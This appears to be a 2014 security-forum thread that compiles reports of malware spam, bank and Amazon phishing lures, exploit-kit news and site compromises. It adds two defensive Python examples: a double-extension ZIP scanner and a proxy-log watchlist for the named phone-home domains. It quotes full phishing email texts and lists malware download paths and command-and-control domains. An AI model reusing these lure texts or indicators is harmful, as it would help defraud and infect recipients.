Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411415107/

- http://threattrack.t...rance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edge...1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecur...es-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
    Thank you.


22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
     Please download your payment advice at ...
     Yours faithfully,
    Global Payments and Cash Management
    This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.


... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53*. This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached your Invoice(s)/Credit(s)
    PETER HOGARTH & SONS LTD
    INDUSTRIAL HYGIENE and PROTECTION
    Tel: 01472 345726 | Fax: 01472 250272 | Web...
    Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
    Peter Hogarth & Sons Ltd is a company registered in England.
    Company Registration Number: 1143352...


22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.c...N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."
 

:ph34r:  <_<


Edited by AplusWebMaster, 23 September 2014 - 07:48 AM.

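The reports in this post keep describing the same lure: an archive member that is really an .exe or .scr but is named to pass as a PDF, WAV or similar once Windows hides the last extension. The following is an added example (not code from the quoted blogs) that flags such member names inside a ZIP attachment; the extension lists, the displayed_name helper and the sample archive are constructed for this demo.

```python
"""Added example: flag ZIP attachments whose members use the spoofed-extension
trick seen in the reports above (a real .exe/.scr dressed up as a PDF, WAV, ...).
Not code from the quoted blogs; extension lists and fixtures are constructed."""
import io
import re
import zipfile

# Extensions Windows runs on double-click (constructed, deliberately short list).
EXEC_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}
# Document-like extensions that the lures in the reports imitate.
LURE_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "jpg", "png", "txt"}
# "Label_..._pdf.exe": a lure word fused to the stem by '_' or '-' rather than '.'.
LURE_IN_STEM = re.compile(r"[_-](" + "|".join(sorted(LURE_EXT)) + r")$")


def displayed_name(name):
    """What Explorer shows with 'hide extensions for known file types' on: only
    the final extension disappears, so 'Invoice.PDF.exe' is shown as 'Invoice.PDF'."""
    head, sep, _ = name.rpartition(".")
    return head if sep else name


def classify_name(name):
    """Return the reasons a member name looks deceptive ([] when it looks fine)."""
    reasons = []
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) < 2:
        return reasons                      # no extension at all
    ext, stem = parts[-1], parts[-2]
    if ext not in EXEC_EXT:
        return reasons                      # documents, archives etc. pass here
    reasons.append("executable extension ." + ext)
    if len(parts) >= 3 and stem in LURE_EXT:
        reasons.append("double extension ." + stem + "." + ext)
    else:
        m = LURE_IN_STEM.search(stem)
        if m:
            reasons.append("lure word '" + m.group(1) + "' in stem")
    return reasons


def scan_zip_bytes(data):
    """Map every file member of an in-memory ZIP to its reasons (RAR needs another lib)."""
    findings = {}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.is_dir():
                    findings[info.filename] = classify_name(info.filename)
    except zipfile.BadZipFile:
        findings["<archive>"] = ["not a valid ZIP archive"]
    return findings


def verdict(attachment_name, data):
    """Decide whether to hold an attachment: bad outer name or any bad member."""
    outer = classify_name(attachment_name)
    members = {m: r for m, r in scan_zip_bytes(data).items() if r}
    return {"attachment": attachment_name, "hold": bool(outer or members),
            "outer": outer, "members": members}


def build_sample_zip(member_names):
    """Constructed fixture: a ZIP whose member names mimic the reports above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in member_names:
            zf.writestr(name, b"constructed placeholder bytes")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip(["Invoice 77261990001.PDF.exe", "readme.txt"])
    print(verdict("Attachment.zip", sample))
    for n in ("cert.scr", "Label_GB1909201488725UK_pdf.exe", "report.pdf"):
        print(n, "->", displayed_name(n), classify_name(n))
```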


#1285 AplusWebMaster

Posted 23 September 2014 - 04:45 AM

FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo....u-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From:     Voice Mail
Date:     23 September 2014 10:17
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...


The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustot...sis/1411464313/

** http://anubis.isecla...27a&format=html

- http://myonlinesecur...ke-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*..."
* https://www.virustot...sis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-secur...ews.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromise happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediate re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.co...t-accounts-risk

>> https://blog.malware...RIG exploit kit

- https://isc.sans.edu...l?storyid=18699
2014-09-23

46.182.31.77: https://www.virustot...77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmic...rlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmic...Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmic...xploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist...d=CVE-2013-0074 - 9.3 (HIGH)
 

:ph34r: :ph34r:  <_<


Edited by AplusWebMaster, 24 September 2014 - 06:39 AM.



#1286 AplusWebMaster

Posted 24 September 2014 - 04:23 AM

FYI...

Fake BankLine SPAM
- http://blog.dynamoo....re-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
    From:     Bankline [secure.message@ bankline .com]
    Date:     24 September 2014 09:59
    Subject:     You have received a new secure message from BankLine
    You have received a secure message.
    Read your secure message by following the link bellow ...
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
    If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
    First time users - will need to register after opening the attachment...


The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustot...sis/1411546325/

** https://anubis.isecl...3ef&format=html

- http://myonlinesecur...ke-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustot...sis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Voice mail SPAM
- http://myonlinesecur...ke-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Time: Sep 23, 2014 10:50:00 AM
    Click attachment to listen to Voice Message


24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecur...nvoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
    Reminder of overdue invoice: 708872110964932
    Overdue Payment: 122274492356288
    Due Date E-Mail Reminder: 417785972641224
    Payment reminder: 461929101577209
    Past Due Reminder Letter: 199488661953143
    Bills Reminder: 325332051074690
    Automatic reminder: 676901889653218
    Late payment: 475999033756578
    Reminder: 215728756825356

The email looks like:
    Hello,
     This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
    Account ID: 5FCDMF9. This notice is a reminder your payment is due.
     Regards,
    Rex Gloeckler
    Olympus Industrial...


24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411570178/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecur...depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
    Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
    Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
    Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...


Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected  or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecur...ghten-security/

- http://threattrack.t...edentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edge...KPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft...ver-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malware...e-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.co...eleases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malware...click-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.c...ached-millions/
Sep 22 2014
 

:ph34r:  <_<


Edited by AplusWebMaster, 24 September 2014 - 08:36 PM.

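The dynamoo reports in this and the previous posts describe one download chain: a link to a page under a ten-letter random directory, a ZIP fetched from that same directory, and a sample that then phones home to a domain the reports call "worth blocking". The following added example (not dynamoo's code) runs that logic over constructed proxy-log lines; the log format, client addresses and compromised-site hostnames are placeholders, while the watchlist domains are the ones named in the reports.

```python
"""Added example: spot the two-step download chain in the reports above (a
/xxxxxxxxxx/xxxxxxxxxx.html landing page, then a ZIP from the same directory)
and any contact with the phone-home domains they say are worth blocking.
Not code from dynamoo; the proxy-log format and hosts here are constructed,
only the watchlist domains come from the reports."""
import re
from collections import defaultdict
from datetime import datetime

# Landing page and directory names in the reports are ten lowercase letters.
RANDOM_PAGE = re.compile(r"^https?://[^/]+/(?P<dir>[a-z]{10})/[a-z]{10}\.html$")
ZIP_IN_DIR = re.compile(r"^https?://[^/]+/(?P<dir>[a-z]{10})/[^/]+\.zip$")
# Phone-home domains named in the reports (shown there with spaces as defanging).
WATCHLIST = {"very-english.co.uk", "ukrchina-logistics.com", "ruralcostarica.com"}
# Constructed log format: "<date> <time> <client> <method> <url> <status>".
LINE = re.compile(r"^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3})$")


def parse_line(line):
    """Parse one constructed proxy-log line; None if it does not fit the format."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def host_of(url):
    """Lower-cased hostname part of an http(s) URL."""
    return re.sub(r"^https?://", "", url).split("/", 1)[0].lower()


def on_watchlist(host):
    """Exact match or subdomain of a watchlisted phone-home domain."""
    return host in WATCHLIST or any(host.endswith("." + d) for d in WATCHLIST)


def analyze(lines, window_seconds=120):
    """Return (client, alert_type, url) tuples in log order.

    'landing-page-then-zip' needs both hops from the same client, same host
    and same random directory within window_seconds; a lone landing page, a
    ZIP from an ordinary path, or a ZIP long after the page raises nothing."""
    alerts = []
    pending = defaultdict(dict)   # client -> (host, dir) -> time of the .html hit
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url, client, ts = rec["url"], rec["client"], rec["ts"]
        host = host_of(url)
        if on_watchlist(host):
            alerts.append((client, "watchlist-contact", url))
        page = RANDOM_PAGE.match(url)
        if page:
            pending[client][(host, page.group("dir"))] = ts
            continue
        zipped = ZIP_IN_DIR.match(url)
        if zipped:
            seen = pending[client].get((host, zipped.group("dir")))
            if seen is not None and 0 <= (ts - seen).total_seconds() <= window_seconds:
                alerts.append((client, "landing-page-then-zip", url))
    return alerts


# Constructed sample: hosts are placeholders; the paths copy the shape in the reports.
SAMPLE_LOG = [
    "2014-09-24 10:01:05 10.0.0.7 GET http://compromised.example/xyzpayohjx/ngkzoeqjjs.html 200",
    "2014-09-24 10:01:06 10.0.0.7 GET http://compromised.example/xyzpayohjx/SecureMessage.zip 200",
    "2014-09-24 10:03:40 10.0.0.7 GET http://very-english.co.uk/ 200",
    "2014-09-24 10:05:00 10.0.0.9 GET http://intranet.example/reports/q3.zip 200",
    "2014-09-24 10:06:00 10.0.0.9 GET http://cdn.example/abcdefghij/fileabcdef.html 200",
    "2014-09-24 11:30:00 10.0.0.9 GET http://cdn.example/abcdefghij/late.zip 200",
    "this line is not in the expected format",
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(*alert)
```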


#1287 AplusWebMaster

Posted 25 September 2014 - 06:25 AM

FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo....nsfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From:     Riley Crabtree [creditdepart@ rbs .co.uk]
    Date:     25 September 2014 10:58
    Subject:     BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

 Sage Account & Payroll: "Outdated Invoice"
    From:     Sage Account & Payroll [invoice@ sage .com]
    Date:     25 September 2014 10:53
    Subject:     Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

Screenshot: https://1.bp.blogspo...s1600/sage2.png

  Lloyds Commercial Bank: "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     25 September 2014 11:36
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

 NatWest Invoice: "Important - New account invoice"
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     25 September 2014 10:28
    Subject:     Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


The links in the emails go to different download locations to make it harder to block... In each case the page then prompts the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustot...sis/1411638249/

- http://threattrack.t...re-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edge...x1ql1r6pupn.png
Tagged: Sage, Upatre
___

Fake BCA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53*. This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake voice mail SPAM – wav malware
- http://myonlinesecur...ke-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustot...95/information/
95.100.255.137: https://www.virustot...37/information/
194.150.168.70: https://www.virustot...70/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Gov't e-mail SCAM
- https://www.ic3.gov/...014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3...  Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states...  If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
 

:ph34r: :ph34r:  <_<


Edited by AplusWebMaster, 25 September 2014 - 02:31 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1288 AplusWebMaster


Posted 26 September 2014 - 05:55 AM

FYI...

Amazon phish ...
- http://myonlinesecur...ation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

Screenshot: http://myonlinesecur...onfirmation.png

Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then taken through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___

Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo....-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

  Employee Documents - Internal Use
From:     victimdomain
Date:     26 September 2014 09:41
Subject:     Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...

 You have a new voice
From:     Voice Mail [Voice.Mail@ victimdomain]
Date:     26 September 2014 09:30
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...

 RBS: BACS Transfer : Remittance for JSAG244GBP
From:     Douglas Byers [creditdepart@ rbs .co.uk]
Date:     26 September 2014 10:12
Subject:     BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...

 New Fax
From:     FAX Message [fax@victimdomain]
Date:     26 September 2014 10:26
Subject:     New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...


... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustot...sis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustot...52/information/
184.106.55.51: https://www.virustot...51/information/
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Bill.com Spam
- http://threattrack.t...8/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
    Payment Details [Incident: 711935-599632]
Typical e-mail details:
    We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


Screenshot: https://gs1.wac.edge...YHaW1r6pupn.png

Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


Tagged: bill.com, Vawtrak
___

More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo....pplication.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.

HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From:     noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date:     26 September 2014 12:26
Subject:     HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...

 Important - BT Digital File
From:     Cory Sylvester [Cory.Sylvester@ bt .com]
Date:     26 September 2014 12:51
Subject:     Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...

 RBS Bankline: Outstanding invoice
    From:     Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To:     <REDACTED>
    Date:     26 September 2014 13:05
    Subject:     Outstanding invoice
